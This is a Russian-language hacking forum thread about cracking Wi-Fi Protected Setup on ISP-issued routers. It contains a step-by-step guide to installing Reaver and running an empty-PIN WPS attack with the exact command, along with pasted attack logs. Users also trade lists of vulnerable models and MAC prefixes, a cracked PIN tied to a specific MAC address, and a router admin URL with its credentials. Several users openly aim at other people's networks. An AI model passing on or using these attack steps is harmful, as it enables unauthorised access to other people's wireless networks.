Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    268
    Likes Received:
    10
    Reputations:
    0
    Офигеть!!!!!До чего техника дошла.....
     
  2. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    А то! :cool: И на десерт...

    Создал пулл реквест в репозиторий PixieWps - добавление поддержки пустого пина. :)
    https://github.com/wiire-a/pixiewps/pull/49
     
    quite gray, Kakoluk, Veil and 8 others like this.
  3. mazik

    mazik Member

    Joined:
    5 Jan 2016
    Messages:
    220
    Likes Received:
    56
    Reputations:
    0
    Хорошая работа мистр БИ.. :);):rolleyes::cool:
    Уже не поддаются.Сменили прошивку.:eek::mad:o_O:mad:
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Но не на всех. :)
     
    fffsfs likes this.
  5. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    268
    Likes Received:
    10
    Reputations:
    0
    Тоесть сичас могу подклюца к тем MTSAa что там? А вот :MTS828FT-9FA4 вроде это название.Да? Через пиксю?
     
  6. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    268
    Likes Received:
    10
    Reputations:
    0
    А как ета добавить в писку? Не понимаю такои
     
  7. spassk14

    spassk14 Member

    Joined:
    11 Sep 2017
    Messages:
    2
    Likes Received:
    5
    Reputations:
    0
    Пробовал с этим флагом -p "" взломать свой ростелекомовский роутер ZTE H118n (v2.3) не работает, не могли бы Вы написать гайд как его взламывали?

    +Я взламывал на Kali Linux, с новым Reaver t6x
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Можете привести лог? Есть вероятность, что в reaver закрался баг.
    С помощью модифицированного Router Scan:
    https://forum.antichat.ru/posts/4122981

    Но он ещё публично не выпустился.
     
  9. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    268
    Likes Received:
    10
    Reputations:
    0
    08:86:3b:d8:2a:6d
    Два предложенных из роутер скан, даже не проверяет
     
  10. spassk14

    spassk14 Member

    Joined:
    11 Sep 2017
    Messages:
    2
    Likes Received:
    5
    Reputations:
    0

    Сегодня попробовал, у меня все получилось)

    Гайд для владельцев ZTE H118N v2.3 (Ростелеком) (Взлом WPS):
    1.Загружаемся в Kali Linux( с флешки)
    2.Подключаемся к интернету (через Wi-Fi, или по кабелю)
    3.Запускаем терминал
    4.Устанавливаем libpcap-dev:
    А.sudo apt-get update (обновление репозитория Kali Linux)
    Б.sudo apt-get install libpcap-dev (Установка PCAP)
    5.Установка Reaver (t6x)
    А.git clone https://github.com/t6x/reaver-wps-fork-t6x
    Б.cd reaver-wps-fork-t6x*/
    cd src/
    ./configure
    make
    В.sudo make install
    5.Когда установили, перезапускаем Терминал
    6.Переводим Wi-Fi адаптер в режим монитора
    7.Вводим: airmon-ng kill (убиваем процессы при соединении по Wi-Fi)
    8.Ищем через wash -i wlan0mon (вместо wlan0mon вводите название Вашего адаптера в режиме монитора) точку, которую будете ломать
    9.Вводим команду (внимательно вводите, чтобы ошибок не было! P.S Вместо wlan0mon вводите ваш адаптер в режиме монитора, BSSID- MAC-Адрес роутера,которого взламываем)
    reaver -i wlan0mon -b bssid -vv -p "" -n
    10.Все, точка взломана)
     
    quite gray, medshai, Anton_co and 2 others like this.
  11. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    26
    Likes Received:
    10
    Reputations:
    0
    Спасибо,Мастер.Вот это мануальчик!
    Попробовал на ZXHN H108N но увы...
    Switching wlan1mon to channel 1
    [+] Waiting for beacon from 74:A7:8E:C1:******
    [+] Associated with 74:A7:8E:C1:****** (ESSID: RT-WiFi_****)
    [+] Trying pin "-n"
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Quitting after 1 crack attempts
    [-] Failed to recover WPA key
    [*] String pin was specified, nothing to save.
    Может что не так делаю? Опыта и знаний явно не хватает.
     
  12. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    26
    Likes Received:
    10
    Reputations:
    0
    А как должна выглядеть команда для пустого пина?
     
  13. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,047
    Likes Received:
    1,127
    Reputations:
    11
    -p ""
     
    quite gray and Kakoluk like this.
  14. muradddddd

    muradddddd Member

    Joined:
    19 May 2017
    Messages:
    215
    Likes Received:
    16
    Reputations:
    0
    А какие роутеры подаються
    к пустым пинам?
     
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    [​IMG]

    Информация уже собирается на 3WiFi.
    Две двойные кавычки после -p поставили? Если да, попробуйте убрать -n в конце.
     
    Kakoluk and Payer like this.
  16. maus

    maus Active Member

    Joined:
    30 May 2015
    Messages:
    410
    Likes Received:
    102
    Reputations:
    0
    CA:A3:66 - ZTE ZXHN H298N -p ""
     
    binarymaster likes this.
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Добавил в список, спасибо!
     
  18. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    271
    Likes Received:
    46
    Reputations:
    0
    Какой алгоритм генерации у роутеров на базе Realtek RTL8671, встречаются с масками RT-WiFi_$$ (где $$ номер квартиры);
    октеты MAC разные, мне встречались 3 разных октета, Router скан один вскрыл, PIN: 05294176, для MAC: d4:bf:7f:52:89:4c.
    Пример интерфейса этого роутера для исследования: http://admin:[email protected]/

    WPS PIN Companion почему-то PIN ассоциирует с Static PIN - UR-825AC
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Неудивительно, это ведь Upvel.
     
  20. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    271
    Likes Received:
    46
    Reputations:
    0
    Пробовал вбивать этот PIN с ключом -p, перебор зацикливается на 90.91%, но в лок не уходит.
    Результат разумеется не выдаёт, может какие другие параметры указать для перебора?